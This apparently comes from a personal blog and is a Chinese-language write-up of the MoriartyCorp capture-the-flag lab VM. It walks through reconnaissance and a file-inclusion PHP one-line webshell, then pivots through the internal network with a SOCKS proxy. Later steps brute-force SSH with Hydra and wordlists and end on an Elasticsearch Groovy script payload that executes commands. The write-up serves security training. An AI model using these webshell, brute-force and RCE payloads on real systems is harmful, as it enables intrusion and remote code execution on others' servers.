Lluna's Pure land.

What is life like when singing to wine?

0%

MoriatyCorp

0x00.官网描述

Hello Agent.

You’re here on a special mission.

A mission to take down one of the biggest weapons suppliers which is Moriarty Corp.

Enter flag{start} into the webapp to get started!

Notes:

  • Web panel is on port 8000 (not in scope. Don’t attack)
  • Flags are stored in #_flag.txt format. Flags are entered in flag{} format. They’re usually stored in / directory but can be in different locations.
  • To temporarily stop playing, pause the VM. Do not shut it down.
  • The webapp starts docker containers in the background when you add flags. Shutting down and rebooting will mess it up.

(the story is bad. sorry for the lack of creativity)

Difficulty: Med-Hard

说明

8000端口提交flag端口

0x01.主机发现

使用arp扫描可以发现目标主机为192.168.56.102

1
2
3
4
5
6
7
8
9
10
11
┌─[✗]─[user@parrot]─[~]
└──╼ $sudo arp-scan 192.168.56.0/24
[sudo] password for user:
Interface: eth0, type: EN10MB, MAC: 08:00:27:00:7c:8d, IPv4: 192.168.56.101
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:0e (Unknown: locally administered)
192.168.56.100 08:00:27:fd:f0:0e PCS Systemtechnik GmbH
192.168.56.102 08:00:27:81:9f:44 PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 2.110 seconds (121.33 hosts/sec). 3 responded

0x02.端口扫描

可以发现开放了22、8000、9000端口,8000为flag提交端口,9000为docker UI端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
┌─[user@parrot]─[~]
└──╼ $sudo nmap -A 192.168.56.102
Starting Nmap 7.92 ( https://nmap.org ) at 2021-09-19 06:06 BST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.102
Host is up (0.0038s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 5a:a7:c8:64:2a:54:bc:64:48:16:2b:79:64:69:cc:45 (RSA)
| 256 89:8d:6a:9b:44:e3:f1:f1:ef:8c:23:13:7a:84:fc:71 (ECDSA)
|_ 256 1d:e6:68:27:52:5b:6d:0d:67:5d:30:4c:03:68:b3:2a (ED25519)
8000/tcp open http Werkzeug httpd 0.14.1 (Python 2.7.15rc1)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
9000/tcp open http Portainer Docker UI 1.19.2
|_http-title: Portainer
MAC Address: 08:00:27:81:9F:44 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 3.78 ms 192.168.56.102

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.55 seconds

0x03.访问8000端口

提交flag{start}开始任务

根据提示访问80端口

这里每提交一次flag就会开放下一关的端口,接下来再扫描一下主机。可看到80端口已经打开

1
2
3
4
5
6
7
8
9
10
11
12
13
┌─[user@parrot]─[~]
└──╼ $sudo nmap -p80 192.168.56.102
[sudo] password for user:
Starting Nmap 7.92 ( https://nmap.org ) at 2021-09-19 06:22 BST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.102
Host is up (0.00049s latency).

PORT STATE SERVICE
80/tcp open http
MAC Address: 08:00:27:81:9F:44 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds

0x04.访问80端口

发现?file=page1.html,直接测试文件包含

文件包含存在,利用php为协议包含一句话木马

0x05.蚁剑连接

1
data://text/plain,<?php eval($_POST['cmd']);?>

0x06.内网渗透

根据提示,内网中存在一台任务靶机

查看当前靶机内网ip为172.17.0.3

使用venom搭建socks代理进行内网穿透,首先上传venom客户端

服务端监听6666端口

客户端回连,构建代理

proxychains添加代理链

内网主机发现,发现172.17.0.4的80端口开放

0x07.访问172.17.0.4

设置代理,访问172.17.0.4

可以上传文件,并且需要密码,接下来进行爆破(bp同样设置代理),密码为password

0x08.上传webshell

0x09.冰蝎连接

得到flag

0x10.爆破ssh

根据提示,给出了用户名与hash值,使用Hydra进行爆破,首先发现目标主机

发现目标主机172.17.0.6

爆破,将明文用户名与密码写入文件(hash值明文都是弱口令,直接网上搜索即可得到)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌─[✗]─[user@parrot]─[~]
└──╼ $cat user
root
toor
admin
mcorp
moriarty
┌─[user@parrot]─[~]
└──╼ $cat pass
root
toor
password
admin
guest
MORIARTY
MCORP
mcorp
weapons
moriarty
┌─[user@parrot]─[~]
└──╼ $proxychains hydra -L user -P pass ssh://172.17.0.6

0x11.登入

1
proxychains ssh root@172.17.0.6

0x12.继续扫描内网

根据提示,继续扫描内网

访问172.17.0.7的8000端口,发现可修改用户密码,抓包尝试修改admin密码,修改成功

使用admin登入

0x13.扫描9200端口

根据提示,内网中存在一台Elasticsearch服务器,Elasticsearch的端口为9200

扫描9200端口

访问172.17.0.8的9200端口

0x14.利用

参考

1
{  "name": "kjsx"}
1
{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"ls\").getText()"}}}
-------------纸短情长下次再见-------------